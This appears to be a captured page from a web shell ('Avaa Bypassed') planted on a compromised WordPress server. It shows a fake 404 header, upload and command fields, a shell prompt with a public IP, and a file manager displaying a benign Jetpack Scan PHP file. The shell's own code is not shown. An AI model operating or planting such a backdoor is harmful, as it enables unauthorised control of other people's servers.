404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.216.61.96: ~ $
<?php
/**
 * Jetpack Scan features that show up on the jetpack admin side.
 * - Adds a admin bar notice when the site has threats.
 *
 * @package automattic/jetpack
 */

namespace Automattic\Jetpack\Scan;

if ( ! apply_filters( 'jetpack_disable_scan', false ) ) {
	require_once __DIR__ . '/class-admin-bar-notice.php';
	require_once __DIR__ . '/class-admin-sidebar-link.php';

	Admin_Bar_Notice::instance();
	Admin_Sidebar_Link::instance();
}

Filemanager

Name Type Size Permission Actions
admin-bar-notice.js File 1.4 KB 0644
class-admin-bar-notice.php File 6.4 KB 0644
class-admin-sidebar-link.php File 5.56 KB 0644
scan.php File 443 B 0644